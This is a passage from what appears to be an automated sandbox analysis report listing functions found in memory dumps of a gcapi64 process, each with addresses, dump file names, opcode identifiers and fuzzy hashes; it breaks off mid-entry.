                                                                  Function 00007FFD9B6C7788 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: b350b87659ba52a575175a3d77da8ee7ff804c2a5ab97f49af97884a18bd2a93
                                                                  • Instruction ID: f54f56d2d44d885e72a7cb70503e6334ca8d2e38374404d546b520cf053bfc7c
                                                                  • Opcode Fuzzy Hash: b350b87659ba52a575175a3d77da8ee7ff804c2a5ab97f49af97884a18bd2a93
                                                                  • Instruction Fuzzy Hash: FD315B32A0E45D0FE325BAA888687B537E2EF86310F0681BAD19CCF1E6D91CB9458350
                                                                  Function 00007FFD9B6C5949 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 37d88aea15681bc3d9f6a36ea5ef50596bb8be257f774b0e0eb1716db7bf8ce3
                                                                  • Instruction ID: 6eee336c8f3b1d522b3c1345d65d0dd34cd802c713d75913bade30962a173d9f
                                                                  • Opcode Fuzzy Hash: 37d88aea15681bc3d9f6a36ea5ef50596bb8be257f774b0e0eb1716db7bf8ce3
                                                                  • Instruction Fuzzy Hash: 9731AE2294F7D94FD72266708C761A47FA0EF13220B0A01EBC6A9CF0F3D858294A8752
                                                                  Function 00007FFD9B6C4CF8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 4a08933debdd0e57411877fcaff424716c931949873197202123d010c8eb03f9
                                                                  • Instruction ID: 5e7aab6d650d9d3d09aa22654fdc842d8d704cf5f1a9eb48f43a6933d5b2f816
                                                                  • Opcode Fuzzy Hash: 4a08933debdd0e57411877fcaff424716c931949873197202123d010c8eb03f9
                                                                  • Instruction Fuzzy Hash: 72210833B0FA4A0AF721FAA498A55F67791EF45310F1101BED92DCB1E2EC1CB9058241
                                                                  Function 00007FFD9B6C4E17 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: a8b6fb32061d91d20ab936fdb40d93c43278ee47879cdd4d3054a89df5aa6c64
                                                                  • Instruction ID: a1f021bf5f5c7ade2483d132688cc568982c53fceab55204fc3c7f9c62801dcf
                                                                  • Opcode Fuzzy Hash: a8b6fb32061d91d20ab936fdb40d93c43278ee47879cdd4d3054a89df5aa6c64
                                                                  • Instruction Fuzzy Hash: 3211E42370E9894FE7A4FEA844A49B037D1DF5931071602BED529CB2A7DE18BE468340
                                                                  Function 00007FFD9B6D0B78 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: e274f625fcb74f4924670a4cd707acd7613ae4d85224efbebd0ec0ec5f96adcf
                                                                  • Instruction ID: eea0a20a8c4a7690ac5a61ab7c460ace6d713f54580c8e7ca25389edf848b336
                                                                  • Opcode Fuzzy Hash: e274f625fcb74f4924670a4cd707acd7613ae4d85224efbebd0ec0ec5f96adcf
                                                                  • Instruction Fuzzy Hash: FD110330B0D64D8EDB65DB6894647FE7FF1DF89310F0401BAD449E71A2CA28A545CBA0
                                                                  Function 00007FFD9B6CC838 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 0e0d3f6783a505f4824fdb2a4c6eb145e06bbbb241862ddbf659aa1f552844af
                                                                  • Instruction ID: 0790f61bf29e32d1db4f47f86f2221948be3b594fbdf06152ca6d9dfa0216d24
                                                                  • Opcode Fuzzy Hash: 0e0d3f6783a505f4824fdb2a4c6eb145e06bbbb241862ddbf659aa1f552844af
                                                                  • Instruction Fuzzy Hash: 1011C83160D5494FEB59EE58D870A7437E2EF99314F1600ADD55ECB2E2CA25F902C744
                                                                  Function 00007FFD9B6CE0B5 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 1c93bbcae0075dbbe7f5673d41c9d04381757e8b5f0acb32766ac2697401a30e
                                                                  • Instruction ID: 4343f2d01bf768dd367c7edf3537c1667993f43b64ba327e96ff86a4b4e309c8
                                                                  • Opcode Fuzzy Hash: 1c93bbcae0075dbbe7f5673d41c9d04381757e8b5f0acb32766ac2697401a30e
                                                                  • Instruction Fuzzy Hash: 7811C631B0854E4FD764FFB88862BA873D2EF8532075506B9E45AC72E7DD28A8518780
                                                                  Function 00007FFD9B6C76E0 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 21625d95a1481ede7e8aa40d3d042378e5d5008aaaa4663041164a1af3d7488d
                                                                  • Instruction ID: 7149be3c197e44027f37504a21b64f071478ad71ef2734fcf6ed3bb0f06a504b
                                                                  • Opcode Fuzzy Hash: 21625d95a1481ede7e8aa40d3d042378e5d5008aaaa4663041164a1af3d7488d
                                                                  • Instruction Fuzzy Hash: 04012821B0E5890FE765B6BC24612F63BD1DF8A310F6508FBC54DCB296D85DA9834341
                                                                  Function 00007FFD9B6CBFF9 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SF
                                                                  • API String ID: 0-3927473838
                                                                  • Opcode ID: 04e6b9c011930868dddac8648bf5c60d40e5c1de4f3e95ac04983b736fea5c7f
                                                                  • Instruction ID: 13f48c79a98ac45f633db6a6a0d5cec75ddbe72bfbf807ab008b95a7ed53b09b
                                                                  • Opcode Fuzzy Hash: 04e6b9c011930868dddac8648bf5c60d40e5c1de4f3e95ac04983b736fea5c7f
                                                                  • Instruction Fuzzy Hash: EB01A211F0A48A0FDB59BBBC44659B926D29F86201B4B40F9E65DCF2A7DE1DBD018390
                                                                  Function 00007FFD9B6C8D7E Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 5f5770c99bf6df33f765c95aadb82ef210ca45a2d21e92026dff1d90ccb3cd6f
                                                                  • Instruction ID: 3b3310ee21138a876a93a79dcad6b675992cb9f455aac6df6f33b231a1428630
                                                                  • Opcode Fuzzy Hash: 5f5770c99bf6df33f765c95aadb82ef210ca45a2d21e92026dff1d90ccb3cd6f
                                                                  • Instruction Fuzzy Hash: A8018F35A1D14A8FE75CEFA4C4B0AB937A2AB46310F1566AEC117CF2E1CD38A5018648
                                                                  Function 00007FFD9B6CA408 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 2a405856bf2a988792e57a55059e80d30d51475b3bdd664a7c4676ba8b53d7ac
                                                                  • Instruction ID: 3a56e92803b5d508042ffb177420c8c0545a9ef81d9f838214d87fe3f8424c29
                                                                  • Opcode Fuzzy Hash: 2a405856bf2a988792e57a55059e80d30d51475b3bdd664a7c4676ba8b53d7ac
                                                                  • Instruction Fuzzy Hash: AA01481264F7C90FE75363B408762F52FB19F47210B1A41E7C188CF0A7D8082A4AC366
                                                                  Function 00007FFD9B6CB2A1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 04e1387b34ec7c45a3ec88ae5c87c04a4388f8aa6d36922cc75b30c7543f3c00
                                                                  • Instruction ID: d37a8426778f83b5c5bf90f00d85a56e579aa4f33182e504d49edd1ec547f952
                                                                  • Opcode Fuzzy Hash: 04e1387b34ec7c45a3ec88ae5c87c04a4388f8aa6d36922cc75b30c7543f3c00
                                                                  • Instruction Fuzzy Hash: FEF01D1190E6D90BF77276A928B51B97FA09F46210F0E04F6C9988F1E7D44D6DC64392
                                                                  Function 00007FFD9B6CE116 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 1dde7f22d9970af5f273836bc883c35d39465801031106079dc822b5cbc3ea84
                                                                  • Instruction ID: 44ff8e3bd91d04a143d7334b4922e6a7ac412971fc7e10f903b11bf1b05e7910
                                                                  • Opcode Fuzzy Hash: 1dde7f22d9970af5f273836bc883c35d39465801031106079dc822b5cbc3ea84
                                                                  • Instruction Fuzzy Hash: 5501D631B1964E0FC758FFB88872AA877D2EF4536035005FDE45AC72E7DD28AC118280
                                                                  Function 00007FFD9B6C8411 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 9833e3a42986b08d56a281286a4eaa9b17b57b911d4702ed67c7e551f4f95725
                                                                  • Instruction ID: 663c62723958fb19363ca8c8b373e0dbb965ae80febeb6a0d9cbe28644e36f86
                                                                  • Opcode Fuzzy Hash: 9833e3a42986b08d56a281286a4eaa9b17b57b911d4702ed67c7e551f4f95725
                                                                  • Instruction Fuzzy Hash: 2601DB22B0E58A1FD765FB9484746F53BD3DF46210B1905FBC05ACF1E6D81C69018380
                                                                  Function 00007FFD9B6CC024 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SF
                                                                  • API String ID: 0-3927473838
                                                                  • Opcode ID: b75b5eacccac5876005d4daef07dfa680cffe0b015dbef2a22223f6dac5d8fdb
                                                                  • Instruction ID: 25a707c6731c1c918ff960f3a52af66e8d7207a8360e6b9a76df254ebf6fcd27
                                                                  • Opcode Fuzzy Hash: b75b5eacccac5876005d4daef07dfa680cffe0b015dbef2a22223f6dac5d8fdb
                                                                  • Instruction Fuzzy Hash: 6BF0A001B0B5590BDA65B6BC48250782AD24F8514078A80B5E269CF3BBDD1E7E834381
                                                                  Function 00007FFD9B6C8F82 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: f3f2eed0e67ccc9e4a31150ebfb31f11e6f4811812e3f144c6de6861c3c168dc
                                                                  • Instruction ID: 09ea9095f9c6a29d9c26b786a5c792b6938c8020c83251bcb2ca3da700833a1b
                                                                  • Opcode Fuzzy Hash: f3f2eed0e67ccc9e4a31150ebfb31f11e6f4811812e3f144c6de6861c3c168dc
                                                                  • Instruction Fuzzy Hash: E7F0B432B0D44A4FDB61EB94C8602F837E2AB46320F1546F7C009CF1E2DD2C6A428790
                                                                  Function 00007FFD9B6CB2C0 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: F5
                                                                  • API String ID: 0-1693313972
                                                                  • Opcode ID: 80aa65f15fd27078e3ab5e4acd4cb9a8dc02ad2d896bcd968518f054be8b3f18
                                                                  • Instruction ID: 9337de084d076f3c8ed4910efd82f5560dd2c3d6dcb7bf2d02d26b26170b1325
                                                                  • Opcode Fuzzy Hash: 80aa65f15fd27078e3ab5e4acd4cb9a8dc02ad2d896bcd968518f054be8b3f18
                                                                  • Instruction Fuzzy Hash: A5E01A21E0F1AD0BFA7239E514A12B97B905F47740F0E48F2CA689F0EAC40DBD864292
                                                                  Function 00007FFD9BA00288 Relevance: 1.0, Instructions: 953COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 40cea39adb16c7f75e02ea7b71c76303bc210f46f0f0eead8bbbf945ee617576
                                                                  • Instruction ID: c982c310002e8d3496433933ab0efda987ad26e03e93fe61cf7bb5757c2a944f
                                                                  • Opcode Fuzzy Hash: 40cea39adb16c7f75e02ea7b71c76303bc210f46f0f0eead8bbbf945ee617576
                                                                  • Instruction Fuzzy Hash: 75628F31B18A4A8FDB58DF1CC4A576973E1FF99700F55016DE89AC7296CE34E842CB81
                                                                  Function 00007FFD9BA0D100 Relevance: .9, Instructions: 876COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee98a99f4148ed841c3c38d34985e2125ba5e76f04dd0fcd3020fcf8de60d2ac
                                                                  • Instruction ID: a27451b818539ae0e79ccc08d07b3b73e74c82609a8b38d952dc30d181104a50
                                                                  • Opcode Fuzzy Hash: ee98a99f4148ed841c3c38d34985e2125ba5e76f04dd0fcd3020fcf8de60d2ac
                                                                  • Instruction Fuzzy Hash: F5523732B0DA4A4FEB68EB5C94616B977D1EF59310F0401BAE89DC71E7DE24ED028781
                                                                  Function 00007FFD9BA114A6 Relevance: .8, Instructions: 817COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb0186932c5d09b53b6a1580f0fbe2a4bc93a2b39067d7baaf6668f370f1ef38
                                                                  • Instruction ID: d8e8b0b0032ebcf3f7bea32836075fadbfd057fe57d53135d1723f56cfe679c5
                                                                  • Opcode Fuzzy Hash: eb0186932c5d09b53b6a1580f0fbe2a4bc93a2b39067d7baaf6668f370f1ef38
                                                                  • Instruction Fuzzy Hash: CA42D230B1DA4D4FDBA8EB6884656B977E2FF59300F1541B9D04DC32A2DE74AD42CB81
                                                                  Function 00007FFD9BA09529 Relevance: .8, Instructions: 815COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d3c4a05140ab8aa67958680b19b24c8c542aa60d432775a423c1849e25b9dca
                                                                  • Instruction ID: 1937ddf092db43ca86fded27f9f8eaff2b807772255284182c5d383b751abaa7
                                                                  • Opcode Fuzzy Hash: 0d3c4a05140ab8aa67958680b19b24c8c542aa60d432775a423c1849e25b9dca
                                                                  • Instruction Fuzzy Hash: 3B420431B19A4E4FEBA8DB6D80696B573D1FF99310F41017DD48EC32A6DE68F9428780
                                                                  Function 00007FFD9BA0D0E4 Relevance: .7, Instructions: 729COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7eaa6ece56b255611ea3886fb2a4342588bd61daa402ec5e20ae45d42edd7647
                                                                  • Instruction ID: e7e6e348dd44102fcc759603103dd02eface93d0cc0766eed7444a6eed3ddebe
                                                                  • Opcode Fuzzy Hash: 7eaa6ece56b255611ea3886fb2a4342588bd61daa402ec5e20ae45d42edd7647
                                                                  • Instruction Fuzzy Hash: 61321432B0D64A4FDB58EB5C94616A977E1EF59310F0401BEE88DCB2E7DE24ED428781
                                                                  Function 00007FFD9BA0A310 Relevance: .6, Instructions: 634COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1dab38d1e40325752d425324b985702b0b1fe6aa58f91c768700d8362e89d2b3
                                                                  • Instruction ID: 09452de61ce909a82b54cc1e3cc122f63d00c9aeedf10afedc25254d9ab9f110
                                                                  • Opcode Fuzzy Hash: 1dab38d1e40325752d425324b985702b0b1fe6aa58f91c768700d8362e89d2b3
                                                                  • Instruction Fuzzy Hash: 18126730B2EA4E4FE3699B68C4A55B977E0FF92300F4541BDD4DBC3196DE28B9028781
                                                                  Function 00007FFD9B795B7D Relevance: .6, Instructions: 584COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02b64357b313acd3866fe946252b733473099cc26a6d2888de5cfa9adf5dcbd4
                                                                  • Instruction ID: acaf3d72e1e3b74534556006c2addaa0624b49e228f6de022ef5a8c575e2a31e
                                                                  • Opcode Fuzzy Hash: 02b64357b313acd3866fe946252b733473099cc26a6d2888de5cfa9adf5dcbd4
                                                                  • Instruction Fuzzy Hash: 0922ED70E0A62D8FEBA4EB98C8657BC77B1FF59341F510279D04DE72A2CA356981CB40
                                                                  Function 00007FFD9BA114E9 Relevance: .5, Instructions: 531COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0873f985c21922d03cc28fa5c2c71fb58703ce0f81cbbe2ba6ae65601b77138
                                                                  • Instruction ID: d49789bf0c5232bc063f9e0aa75e023a15acdd57c6731bc695e6b195c6222637
                                                                  • Opcode Fuzzy Hash: c0873f985c21922d03cc28fa5c2c71fb58703ce0f81cbbe2ba6ae65601b77138
                                                                  • Instruction Fuzzy Hash: 2F02A030B1DA4D4FDBA8EB6884656B977E2EF59300F0501BAD04DC72A2DE74AD42CB81
                                                                  Function 00007FFD9B79150E Relevance: .5, Instructions: 474COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01a28a0bd5ccae5fb17f40caa48e0454a09f36697ee8ced0b1ad70535736fdb8
                                                                  • Instruction ID: 6b69b2b43cf665abc232d57134113e9a3ad6a6ce300920d0b35c65fc309f9660
                                                                  • Opcode Fuzzy Hash: 01a28a0bd5ccae5fb17f40caa48e0454a09f36697ee8ced0b1ad70535736fdb8
                                                                  • Instruction Fuzzy Hash: 1CE12932B0FB8E5FE7A59AAC48755B877E1EF55210B0A02BBD05EC75F3DD28A8118341
                                                                  Function 00007FFD9BA061E1 Relevance: .5, Instructions: 462COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee3a67ffd67f0d72bb803441f59071048181efe81cf25cb2f76a2fe8e7781502
                                                                  • Instruction ID: 981f7eebbc05b3f82bbf416e59593f8fdfcf1af93cf180469f7e2e3b74b974dd
                                                                  • Opcode Fuzzy Hash: ee3a67ffd67f0d72bb803441f59071048181efe81cf25cb2f76a2fe8e7781502
                                                                  • Instruction Fuzzy Hash: 53D1B530B1995D4FEBA8EB6C8469B7437D1FF9A314F0540BAE08DC72A6DE68EC418741
                                                                  Function 00007FFD9BA11E15 Relevance: .4, Instructions: 414COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3377f906b45fc750adddc916629fd5f29cbe35071c65d3cecd1ecd58cb6bf489
                                                                  • Instruction ID: c65eb6a073a371739330993fad7fbabe4733b341e0c834bd4f125a9bc11f45f0
                                                                  • Opcode Fuzzy Hash: 3377f906b45fc750adddc916629fd5f29cbe35071c65d3cecd1ecd58cb6bf489
                                                                  • Instruction Fuzzy Hash: CAC17A3170DA4D4FEBA8EFA884645B577E1FFA5350B4501BAE44EC72A2DE64EC42C780
                                                                  Function 00007FFD9BA08B80 Relevance: .4, Instructions: 405COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d57a0f84804b6c84b841a97dfbb11f4cecc6b5f64478b31126b2e1e8af8d32f6
                                                                  • Instruction ID: 01d373ae66692188be430c91b137904408ddc59dd220a96033bd9e9ea0adae90
